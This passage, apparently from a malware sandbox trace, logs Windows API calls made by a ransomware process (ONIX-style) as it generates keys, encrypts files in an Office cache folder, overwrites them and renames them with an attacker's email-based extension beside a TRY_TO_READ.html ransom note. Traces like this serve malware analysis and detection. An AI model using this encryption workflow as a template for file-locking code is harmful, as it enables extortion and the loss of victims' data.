ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1 [0102.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0102.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4587d0 [0102.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.422] GetLastError () returned 0x0 [0102.423] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x1fc [0102.423] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0102.424] LockFile (hFile=0x1fc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5ac, nNumberOfBytesToLockHigh=0x0) returned 1 [0102.424] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.424] ReadFile (in: hFile=0x1fc, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0102.425] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.425] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.425] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0102.425] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0102.426] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", dwFileAttributes=0x80) returned 1 [0102.426] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 78 [0102.426] GetProcessHeap () returned 0x410000 [0102.426] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0102.426] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" [0102.426] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0102.426] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1452) returned 1 [0102.426] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5ac [0102.426] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0102.426] GetProcessHeap () returned 0x410000 [0102.426] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0102.426] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0102.426] WriteFile (in: hFile=0x1fc, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0102.428] WriteFile (in: hFile=0x1fc, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0102.429] WriteFile (in: hFile=0x1fc, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0102.430] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5ac) returned 0x4d6b68 [0102.430] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5ac) returned 0x4d7120 [0102.430] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.431] ReadFile (in: hFile=0x1fc, lpBuffer=0x4d6b68, nNumberOfBytesToRead=0x5ac, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b68*, lpNumberOfBytesRead=0x367f44c*=0x5ac, lpOverlapped=0x0) returned 1 [0102.431] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-1452, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.431] WriteFile (in: hFile=0x1fc, lpBuffer=0x4d7120*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d7120*, lpNumberOfBytesWritten=0x367f44c*=0x5ac, lpOverlapped=0x0) returned 1 [0102.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b68 | out: hHeap=0x410000) returned 1 [0102.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d7120 | out: hHeap=0x410000) returned 1 [0102.432] UnlockFile (hFile=0x1fc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5ac, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0102.432] CloseHandle (hObject=0x1fc) returned 1 [0102.433] GetProcessHeap () returned 0x410000 [0102.433] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0102.433] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0102.435] GetProcessHeap () returned 0x410000 [0102.435] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0102.435] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0102.435] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0102.435] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0102.435] FindNextFileW (in: hFindFile=0x48eb70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b7cde0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dcd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProjLR.cab", cAlternateFileName="")) returned 1 [0102.435] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0102.435] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.435] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4587d0 [0102.435] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.435] GetLastError () returned 0x0 [0102.435] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x1fc [0102.436] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0102.436] LockFile (hFile=0x1fc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x7e1dcd, nNumberOfBytesToLockHigh=0x0) returned 1 [0102.436] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.437] ReadFile (in: hFile=0x1fc, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0102.438] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.438] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.438] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0102.438] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0102.438] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", dwFileAttributes=0x80) returned 1 [0102.439] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 74 [0102.439] GetProcessHeap () returned 0x410000 [0102.439] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x104) returned 0x467908 [0102.439] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" [0102.439] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0102.439] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=8265165) returned 1 [0102.439] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x7e1dcd [0102.439] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0102.439] GetProcessHeap () returned 0x410000 [0102.439] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0102.439] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0102.439] WriteFile (in: hFile=0x1fc, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0102.441] WriteFile (in: hFile=0x1fc, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0102.442] WriteFile (in: hFile=0x1fc, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0102.443] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7e1dcd) returned 0x3680020 [0102.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7e1dcd) returned 0x3e70020 [0102.444] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.444] ReadFile (in: hFile=0x1fc, lpBuffer=0x3680020, nNumberOfBytesToRead=0x7e1dcd, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x7e1dcd, lpOverlapped=0x0) returned 1 [0102.877] UnlockFile (hFile=0x1fc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x7e1dcd, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0102.877] CloseHandle (hObject=0x1fc) returned 1 [0102.878] GetProcessHeap () returned 0x410000 [0102.878] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0102.878] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0102.881] GetProcessHeap () returned 0x410000 [0102.881] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0102.881] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0102.881] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0102.881] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0102.881] FindNextFileW (in: hFindFile=0x48eb70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0102.881] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0102.881] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.881] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4587d0 [0102.881] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.881] GetLastError () returned 0x0 [0102.881] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x1fc [0102.881] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0102.882] LockFile (hFile=0x1fc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x750, nNumberOfBytesToLockHigh=0x0) returned 1 [0102.882] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.882] ReadFile (in: hFile=0x1fc, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0102.883] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.883] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.883] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0102.883] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0102.883] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0102.884] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0102.884] GetProcessHeap () returned 0x410000 [0102.884] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0102.884] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" [0102.884] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0102.884] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1872) returned 1 [0102.884] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x750 [0102.884] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0102.884] GetProcessHeap () returned 0x410000 [0102.884] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0102.884] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0102.884] WriteFile (in: hFile=0x1fc, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0102.886] WriteFile (in: hFile=0x1fc, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0102.887] WriteFile (in: hFile=0x1fc, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0102.888] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x750) returned 0x4d6b68 [0102.888] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x750) returned 0x4d72c0 [0102.888] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.888] ReadFile (in: hFile=0x1fc, lpBuffer=0x4d6b68, nNumberOfBytesToRead=0x750, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b68*, lpNumberOfBytesRead=0x367f44c*=0x750, lpOverlapped=0x0) returned 1 [0102.888] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-1872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.888] WriteFile (in: hFile=0x1fc, lpBuffer=0x4d72c0*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d72c0*, lpNumberOfBytesWritten=0x367f44c*=0x750, lpOverlapped=0x0) returned 1 [0102.890] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b68 | out: hHeap=0x410000) returned 1 [0102.890] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d72c0 | out: hHeap=0x410000) returned 1 [0102.890] UnlockFile (hFile=0x1fc, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x750, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0102.890] CloseHandle (hObject=0x1fc) returned 1 [0102.891] GetProcessHeap () returned 0x410000 [0102.891] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0102.891] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0102.894] GetProcessHeap () returned 0x410000 [0102.894] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0102.894] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0102.894] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0102.894] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0102.894] FindNextFileW (in: hFindFile=0x48eb70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c42390, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0102.894] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0102.894] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.894] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4587d0 [0102.894] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.894] GetLastError () returned 0x0 [0102.894] FindNextFileW (in: hFindFile=0x48eb70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c42390, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0102.894] CloseHandle (hObject=0x3cc) returned 1 [0102.894] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0102.895] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x2a, wMilliseconds=0x10f)) [0102.895] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0102.895] GetWindowsDirectoryW 